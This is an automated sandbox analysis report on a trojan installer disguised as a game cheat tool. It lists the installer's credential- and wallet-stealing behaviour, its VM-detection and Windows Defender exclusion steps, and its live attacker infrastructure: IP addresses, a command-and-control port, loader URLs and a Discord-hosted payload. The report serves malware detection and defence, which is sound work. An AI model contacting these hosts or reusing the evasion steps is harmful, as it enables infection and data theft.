HOSTGLOBALPLUS-ASRU Russian Federation 20->73 89 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 20->89 91 Found many strings related to Crypto-Wallets (likely being stolen) 20->91 93 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 20->93 95 Tries to harvest and steal browser information (history, passwords, etc) 20->95 36 conhost.exe 20->36         started        38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        42 cmd.exe 1 28->42         started        45 LuaJIT.exe 30->45         started        signatures10 process11 signatures12 97 Suspicious powershell command line found 42->97 99 Adds a directory exclusion to Windows Defender 42->99 47 powershell.exe 23 42->47         started        49 conhost.exe 42->49         started        process13

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Cheat.Lab.2.7.2.msi3%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\MSIAB91.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSIAC3E.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSIAC5E.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSIAC8E.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSIACBE.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSIAD1D.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSIAEA5.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSIAEC5.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSIAEF5.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID74E.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\MSID76E.tmp0%ReversingLabs
                    C:\Windows\Installer\MSIBD45.tmp0%ReversingLabs
                    C:\Windows\Installer\MSIBDB3.tmp0%ReversingLabs
                    C:\Windows\Installer\MSIBE12.tmp0%ReversingLabs
                    C:\Windows\Installer\MSIBE32.tmp0%ReversingLabs
                    C:\Windows\Installer\MSIBE81.tmp0%ReversingLabs
                    C:\Windows\Installer\MSIBF2F.tmp0%ReversingLabs
                    C:\Windows\Installer\MSIC01A.tmp0%ReversingLabs
                    C:\Windows\Installer\MSICA9B.tmp0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://tempuri.org/Entity/Id23ResponseD0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id2Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id12Response0%Avira URL Cloudsafe
                    http://tempuri.org/0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id21Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id80%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id90%Avira URL Cloudsafe
                    http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms80%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id50%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id19Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id40%Avira URL Cloudsafe
                    http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Mso80%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id60%Avira URL Cloudsafe
                    http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Msg0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id70%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id6Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id9Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id200%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id1ResponseD0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id210%Avira URL Cloudsafe
                    http://193.37.71.112/0%Avira URL Cloudsafe
                    91.103.252.48:33597100%Avira URL Cloudmalware
                    https://luajit.org/0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id230%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id220%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id240%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id1Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id100%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id120%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id110%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id16Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id130%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id150%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id170%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id160%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id140%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id190%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id180%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id10Response0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                    http://193.37.71.112/Roaming0%Avira URL Cloudsafe
                    http://tempuri.org/Entity/Id8Response0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    cdn.discordapp.com
                    		162.159.135.233
                    		truefalse
                      		high
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txtfalse
                          		high
                          91.103.252.48:33597true
                          • Avira URL Cloud: malware
                          		unknown
                          http://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txtfalse
                            		high
                            http://ip-api.com/json/?fields=query,status,countryCode,city,timezonefalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/02/sc/sctconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabconnect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms8LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id23ResponseDconnect.exe, 00000016.00000002.2133528800.0000000002C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id12Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://tempuri.org/connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://tempuri.org/Entity/Id2Responseconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id21Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id9connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id8connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://193.37.71.112/LuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://tempuri.org/Entity/Id5connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepareconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/Entity/Id4connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://tempuri.org/Entity/Id7connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://tempuri.org/Entity/Id6connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://tempuri.org/Entity/Id19Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issueconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://luajit.org/LuaJIT.exe.2.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://193.37.71.112/loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Mso8LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://193.37.71.112/task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2MsgLuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://tempuri.org/Entity/Id15Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txtyLuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newconnect.exefalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registerconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id6Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.ip.sb/ipconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2004/04/scconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id1ResponseDconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/Entity/Id9Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id20connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://tempuri.org/Entity/Id21connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://tempuri.org/Entity/Id22connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id23connect.exe, 00000016.00000002.2133528800.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://tempuri.org/Entity/Id24connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issueconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://tempuri.org/Entity/Id24Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.ecosia.org/newtab/connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id1Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Replayconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binaryconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressingconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issueconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.advancedinstaller.comCheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drfalse
                                                                                                                    		high
                                                                                                                    https://www.ecosia.org/newtconnect.exefalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tempuri.org/Entity/Id10connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id11connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id12connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id16Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id13connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id14connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id15connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id16connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Nonceconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id17connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id18connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id5Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id19connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://tempuri.org/Entity/Id10Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Renewconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/Entity/Id8Responseconnect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://193.37.71.112/RoamingLuaJIT.exe, 00000009.00000002.1936998576.0000022EB3517000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyconnect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      208.95.112.1
                                                                                                                                      		ip-api.comUnited States
                                                                                                                                      		53334TUT-ASUSfalse
                                                                                                                                      91.103.252.48
                                                                                                                                      		unknownRussian Federation
                                                                                                                                      		202306HOSTGLOBALPLUS-ASRUtrue
                                                                                                                                      162.159.135.233
                                                                                                                                      		cdn.discordapp.comUnited States
                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                      193.37.71.112
                                                                                                                                      		unknownRussian Federation
                                                                                                                                      		202723VAD-SRL-AS1MDfalse

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox Version:38.0.0 Ammolite
                                                                                                                                      Analysis ID:1337697
                                                                                                                                      Start date and time:2023-11-06 15:34:05 +01:00
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 10m 56s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:27
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample file name:Cheat.Lab.2.7.2.msi
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal60.troj.spyw.evad.winMSI@30/50@2/4
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 66.7%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 98%
